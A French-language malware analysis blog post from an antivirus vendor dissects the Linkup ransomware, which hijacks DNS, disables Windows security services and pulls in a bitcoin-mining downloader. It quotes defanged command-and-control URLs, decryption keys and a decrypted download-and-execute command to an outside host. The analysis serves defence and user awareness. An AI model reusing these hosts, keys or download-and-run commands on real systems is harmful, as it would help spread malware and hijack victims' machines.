Analyse de malwares : Rançongiciel « Linkup » bloque DNS et fore des bitcoins

  • février 3, 2014
  • 6 min read

locker-page-step3

Pendant la dernière semaine, l’équipe d’experts en malwares d’Emsisoft a examiné minutieusement une nouvelle variante de rançongiciel et troyen qu’Emsisoft Anti-Malware détecte comme Trojan-Ransom.Win32.Linkup.

« Linkup » est un rançongiciel intéressant, vu que, contrairement à des variantes précédentes, il ne verrouille pas directement votre ordinateur ou chiffre vos fichiers.  Par contre, Linkup bloque votre connexion Internet en modifiant votre DNS et peut également transformer votre ordinateur en robot qui fore des bitcoins.

 Comment vous protéger contre Linkup

Tous ceux qui utilisent Emsisoft Anti-Malware sont déjà à l’abri de Linkup et devraient bloquer le logiciel lorsqu’il est identifié comme Trojan-Ransom.Win32.Linkup.  Les utilisateurs ayant attrapé une infection causée par Linkup seront coupés d’ internet et se verront face au « site web » suivant lorsqu’ils essaient de naviguer.

locker-page-step1

Ce que vous voyez, c’est un formulaire typique présenté par les rançongiciels, qui, dans ce cas, vous demande des informations personnelles et le paiement d’une rançon afin de débloquer votre connexion Internet.  Le formulaire dit que vous ne devrez payer qu’une somme de 0,01 EUR, mais ce n’est pas encore confirmé et très probablement rien d’autre qu’un mensonge évident.  N’envoyez pas d’informations personnelles !  Si votre ordinateur a été infecté, nous vous conseillons de trouver une autre possibilité de vous connecter sur Internet afin de contacter l’assistance technique d’Emsisoft qui vous aidera à vous débarrasser de cet ennui.

Comment Linkup fonctionne

Une fois que Linkup a été exécuté, il fait une copie de lui-même dans le dossier %AppData%MicrosoftWindows, le nom de cette copie étant svchost.exe, un nom falsifié qui prétend être un fichier normal de votre ordinateur, qui se trouve dans le dossier %windir%system32.  Afin de signaler sa présence dans le système, Linkup crée un mutex nommé tnd990r ou tnd990s. Nous avons également découvert que Linkup désactive les services de sécurité et de pare-feu de Windows pour faciliter l’infection.

new-disable-services

Une fois que Linkup s’est établi sur votre ordinateur, il se met en contact avec son serveur pour lui fournir des données relatives à votre PC.  Et ceci en envoyant une requête POST à l’adresse suivante, transmise sous forme chiffrée.

new-contacting-serverQuel genre de données Linkup envoie-t-il au serveur ?  Sous forme déchiffrée, la valeur du « token » est comme suit :

uid=xxxxx&ver=3.55&dl=0&il=0&dip=j5w4FFXB&wl=ENU &wv=5.1.2600.SP3.0.256.1.2.x86&ia=1

C’est votre ID d’utilisateur unique (uid), votre version de Windows (ver) ainsi que votre langue – dans ce cas, ENU ou anglais américain.  Ces informations facilitent l’infection, étant donné que Linkup a besoin de savoir sur quel type d’ordinateur il opère afin de bien fonctionner.

Linkup se donnera également une couche redondante pour communiquer avec le serveur de commandes et de contrôle même si un hôte rate. En déchiffrant, nous trouvons les hôtes de commandes et de contrôle suivants :

hxxp://62.75.221.37/uplink.php?logo.jpg

hxxp://hoseen45r.com/uplink.php?logo.jpg

hxxp://onetimes21s.com/uplink.php?logo.jpg

hxxp://setpec14rs.com/uplink.php?logo.jpg

Linkup déchiffre la chaîne de caractères à l’aide de la clé suivante :

IVW-Q3Xo5sBYzDTJK6LPuSrvEkAcghH8lw0GbfFe9dn_MRpqxONZam7ij2yUC14t

new-decrypt-body-string

D’ailleurs, on trouve une autre chaîne de caractères intéressante dans Linkup, qui est en effet une autre clé de déchiffrement :

Fo6u-YTelBCv0Ac4XiRW_1GJSV2O8jP7nZkbwqLENshpHtg5Kxa3QMfzrUDy9dmI

Cette clé traduit des commandes en provenance du serveur de Linkup de telle façon que le logiciel malveillant puisse les exécuter. Lors de la première connexion, la toute première commande envoyée est la suivante :

nK_RglbAg_3Axlb0z0bv1Bq6NokWKiej59kcg-WcKlb0f-bvara0Kdk0a0ejr1LvFFXV

Linkup déchiffre cette commande à l’aide de sa clé et en fait :

IL 62.75.221.37 RUN hxxp://91.220.163.22/pts2.exe

decryption

La première commande (IL 62.75.221.37) redirige toute requête HTTP vers le site web du rançongiciel, se trouvant à 62.75.221.37, dont l’adresse est hxxp://62.75.221.37/worlds/test/index.html. À ce stade, Linkup commence à rediriger votre DNS de sorte que vous finissez toujours sur le site web du rançongiciel peu importe sur quelle page vous naviguez.

Afin de rediriger toute requête DNS, Linkup effectue plusieurs modifications dans le registre de Windows, dont la suivante :

Linkup accomplit cette action en mettant à jour plusieurs paramètres de votre connexion sur Internet pour assurer que les modifications soient immédiatement prises en compte.  Et ceci en exécutant les commandes suivantes :

new-refresh-network

Cette redirection est déjà malicieuse, mais ce qui surprend, c’est que Linkup ne s’y limite pas.  Veuillez noter la deuxième linge de la commande d’origine provenant du serveur : RUN hxxp://91.220.163.22/pts2.exe.  Cette commande fait en sorte que votre ordinateur télécharge et exécute le fichier pts2.exe.  Qu’est-ce pts2.exe ?  Un téléchargeur conçu pour connecter votre ordinateur sur un botnet destiné au forage de bitcoins !

Un botnet destiné au forage de bitcoins ?

Les processus techniques du « forage de bitcoins » sont complexes.  Pour avoir un résumé, veuillez consulter “Geeks Love The Bitcoin Phenomenon Like They Loved the Internet in 1995” par Ken Tiddel ou  Attaque sur Bitcoins publié par Emsisoft.

Pour ce qui est de Linkup, l’aspect le plus important du forage de bitcoins, c’est qu’un pirate est capable de gagner plus de bitcoins une fois qu’il aura ramassé plus de capacité de calcul.  C’est pourquoi, à part bloquer votre connexion sur Internet, Linkup essaie également de connecter votre ordinateur sur un bot destiné au forage de bitcoins qui est à même de combiner la capacité de calcul de plusieurs ordinateurs infectés afin de faire gagner de nouveaux bitcoins à celui qui est responsable de l’attaque.

Pts2.exe est un téléchargeur et se trouve dans le même dossier que le fichier falsifié svchost.exe par lequel nous avons entamé cette analyse.  Derrière les coulisses, pts2.exe est traité sous le nom de Update_%random%.exe.  C’est un fichier basé sur .NET destiné à télécharger et exécuter un autre fichier depuis hxxp://64.32.28.155/b.exe et le sauvegarder sous C:UsersPublicb.exe.

pts2-downloaderEn poursuivant l’analyse, notre équipe d’experts en malwares a trouvé que ce fichier est un RAR auto-extractible qui décomprime plusieurs fichiers de script et un fichier exécutable.  Le script SFX exécute un fichier 64-bit PE, nommé j.exe, qui est jhProtominer. Le nom faisant référence à « mining » (forage), jhProtominer est une application destinée au forage de bitcoins.

Cette combinaison d’un rançongiciel et du forage de bitcoins est un nouveau développement fascinant.  Pour l’instant, la fonctionnalité est encore assez limitée vu que jhProtominer ne fonctionne que sur les systèmes d’exploitation 64 bit.  Il sera intéressant de voir les modifications auxquelles Linkup sera soumis afin de donner naissance à des variantes plus flexibles.

Hashs de fichiers analysés dans cet article

Que pensez-vous de Linkup ?

Dans les semaines à venir, l’équipe d’experts en malwares d’Emsisoft surveillera de très près Linkup, vu que le malware évoluera sans aucun doute. Nous vous fournissons cette analyse parce que Linkup représente une nouvelle approche pour infecter votre ordinateur qui combine deux technologies connues – celle d’un rançongiciel et celle du forage de bitcoins – afin de créer une forme puissante de malwares destinés à la génération de revenus.

Si vous avez des questions relatives à Linkup, nous vous invitons à contacter directement l’assistance technique d’Emsisoft. Vous pouvez faire part de vos pensées et même de vos propres découvertes qui aideront Emsisoft à poursuivre notre mission qui consiste à débarrasser le monde des malwares.  Entre-temps, soyez prudents et bonne navigation (sans rançongiciels) !

 

Abstrait : L’équipe d’experts en malwares d’Emsisoft a examiné minutieusement une nouvelle variante de rançongiciel et troyen qu’Emsisoft Anti-Malware détecte comme Trojan-Ransom.Win32.Linkup.

Linkup est capable de bloquer votre DNS et transformer votre PC en robot destiné au forage de bitcoins !

Continuez à lire et apprenez-en plus.

Steve

What to read next

Reader Comments